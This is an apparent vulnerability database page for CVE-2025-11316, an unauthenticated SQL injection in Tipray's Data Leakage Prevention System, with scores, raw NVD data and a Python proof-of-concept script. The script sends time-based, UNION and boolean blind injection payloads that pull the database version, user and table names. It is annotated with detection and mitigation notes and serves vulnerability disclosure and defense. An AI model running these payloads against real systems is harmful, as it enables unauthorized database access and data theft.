Security Vulnerability Report
CVE-2025-11316 CVSS 7.3 HIGH

CVE-2025-11316

Published: 2025-10-06 03:15:32
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was determined in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. Affected by this issue is the function findCategoryPage of the file findCategoryPage.do. Executing manipulation of the argument tenantId can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
7.3
Severity
HIGH
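CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: the 7.3 HIGH score above is the one marked "Secondary" in the raw record at the bottom of this page. The same record also carries a "Primary" CVSS 3.1 assessment of 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), a CVSS 4.0 score of 5.5 MEDIUM and a CVSS 2.0 score of 7.5, so the headline figure is not the only rating attached to this CVE.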

Configurations (Affected Products)

cpe:2.3:a:tipray:data_leakage_prevention_system:1.0:*:*:*:*:*:*:* - VULNERABLE
天锐数据泄露防护系统 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
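# CVE-2025-11316 - Tipray Data Leakage Prevention System SQL Injection PoC
# Vulnerability: SQL Injection in findCategoryPage.do via tenantId parameter
# Author: Security Researcher
# Reference: https://github.com/FightingLzn9/vul
#
# Reviewer notes (defensive context)
# ----------------------------------
# What the advisory establishes: the tenantId argument handled by
# findCategoryPage.do is injectable, remotely, with no privileges required
# (PR:N in the published vectors).
#
# What this listing assumes and the advisory does not state:
#   * the endpoint sits at the web root and takes tenantId as a POST form field;
#   * the backend speaks a MySQL-style dialect (SLEEP, database(),
#     information_schema);
#   * the injected query returns exactly three columns.
# If any of these is wrong for a given deployment, the script reports
# "not vulnerable" even though the flaw is present. A negative result from it
# is therefore not evidence that a host is unaffected.
#
# Detection: every request below goes to /findCategoryPage.do with a tenantId
# value containing a single quote followed by SQL keywords (UNION SELECT,
# SLEEP(, information_schema) and a trailing "-- " comment marker. The values
# travel in the POST body, which default access logs usually do not record, so
# matching on them needs WAF, reverse-proxy or application-level body logging.
#
# Mitigation: the page records no vendor response and references no fix.
# Until one exists, limit network reachability of the management interface,
# reject tenantId values that do not match the expected identifier format at a
# proxy in front of the application (format presumably numeric - confirm
# against a legitimate request), and run the application's database account
# with the least privilege it needs.

import sys
import time

import requests

TARGET_URL = "http://target-host:8080"
VULNERABLE_ENDPOINT = "/findCategoryPage.do"


def check_vulnerability(base_url):
    """Compare the latency of a baseline request and a SLEEP(3) request.

    Args:
        base_url: Scheme, host and port of the system under test; the
            endpoint path is appended unchanged.

    Returns:
        True when the delayed request took at least 2 seconds longer than the
        baseline, False otherwise or when either request failed.

    Limitations: one sample per request, so network jitter or a slow backend
    can produce a false positive; the HTTP status and body are never
    inspected, so any slow responder (including an unrelated host) can look
    affected.
    """
    url = base_url + VULNERABLE_ENDPOINT

    # Baseline request
    normal_payload = {"tenantId": "1"}

    # Time-based blind injection payload
    time_based_payload = {"tenantId": "1' AND SLEEP(3)-- "}

    try:
        # monotonic() instead of time(): a wall-clock adjustment between the
        # two readings must not distort the measured delay.
        start_time = time.monotonic()
        requests.post(url, data=normal_payload, timeout=10)
        normal_time = time.monotonic() - start_time

        start_time = time.monotonic()
        requests.post(url, data=time_based_payload, timeout=10)
        malicious_time = time.monotonic() - start_time
    except requests.RequestException as e:
        # Only transport/HTTP-library failures are expected here; anything
        # else is a programming error and should surface.
        print(f"[!] Error: {e}")
        return False

    delay = malicious_time - normal_time
    if delay >= 2:
        print(f"[+] Target appears vulnerable! Response delay: {delay:.2f}s")
        return True

    print(f"[-] Target may not be vulnerable. Response delay: {delay:.2f}s")
    return False


def exploit_union_injection(base_url):
    """Send the listing's UNION-based payloads and print each response prefix.

    Nothing is parsed or returned: the first 500 characters of every response
    body are printed as-is, so whether a payload had any effect has to be
    judged by reading the output. The three-column layout is an assumption of
    this listing (see the notes at the top of the file).
    """
    url = base_url + VULNERABLE_ENDPOINT

    payloads = [
        # Extract database version
        {"tenantId": "1' UNION SELECT 1,version(),3-- "},
        # Extract current database
        {"tenantId": "1' UNION SELECT 1,database(),3-- "},
        # Extract current user
        {"tenantId": "1' UNION SELECT 1,user(),3-- "},
        # Extract table names from information_schema
        {"tenantId": "1' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()-- "},
    ]

    for payload in payloads:
        try:
            resp = requests.post(url, data=payload, timeout=10)
        except requests.RequestException as e:
            print(f"[!] Error: {e}")
            continue

        print(f"[+] Payload: {payload['tenantId']}")
        print(f"[+] Response: {resp.text[:500]}")
        print("-" * 60)


def exploit_boolean_blind(base_url):
    """Compare the response bodies of an always-true and an always-false condition.

    Returns:
        True when the two bodies differ, False when they are identical or a
        request failed.

    Limitation: any per-request variation in the page (timestamps, tokens,
    session data) also makes the bodies differ, so True is an indication
    rather than a confirmation.
    """
    url = base_url + VULNERABLE_ENDPOINT

    true_payload = {"tenantId": "1' AND 1=1-- "}
    false_payload = {"tenantId": "1' AND 1=2-- "}

    try:
        true_resp = requests.post(url, data=true_payload, timeout=10)
        false_resp = requests.post(url, data=false_payload, timeout=10)
    except requests.RequestException as e:
        print(f"[!] Error: {e}")
        return False

    if true_resp.text != false_resp.text:
        print("[+] Boolean-based blind injection confirmed!")
        print(f"[+] True condition response length: {len(true_resp.text)}")
        print(f"[+] False condition response length: {len(false_resp.text)}")
        return True

    return False


if __name__ == "__main__":
    # The first command-line argument overrides the placeholder base URL.
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL

    print(f"[*] Testing CVE-2025-11316 against: {target}")
    print("=" * 60)

    if check_vulnerability(target):
        print("\n[*] Attempting UNION-based exploitation...")
        exploit_union_injection(target)

        print("\n[*] Attempting boolean-based blind exploitation...")
        exploit_boolean_blind(target)
    else:
        print("[-] Target does not appear vulnerable")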

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11316", "sourceIdentifier": "[email protected]", "published": "2025-10-06T03:15:32.003", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. Affected by this issue is the function findCategoryPage of the file findCategoryPage.do. Executing manipulation of the argument tenantId can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": 
[{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tipray:data_leakage_prevention_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "25FED908-237A-432E-9605-57E982321BD3"}]}]}], "references": [{"url": "https://github.com/FightingLzn9/vul/blob/main/%E5%A4%A9%E9%94%90%E6%95%B0%E6%8D%AE%E6%B3%84%E9%9C%B2%E9%98%B2%E6%8A%A4%E7%B3%BB%E7%BB%9F-8.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327197", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327197", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.663506", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/FightingLzn9/vul/blob/main/%E5%A4%A9%E9%94%90%E6%95%B0%E6%8D%AE%E6%B3%84%E9%9C%B2%E9%98%B2%E6%8A%A4%E7%B3%BB%E7%BB%9F-8.md", "source": "134c70 ... (truncated)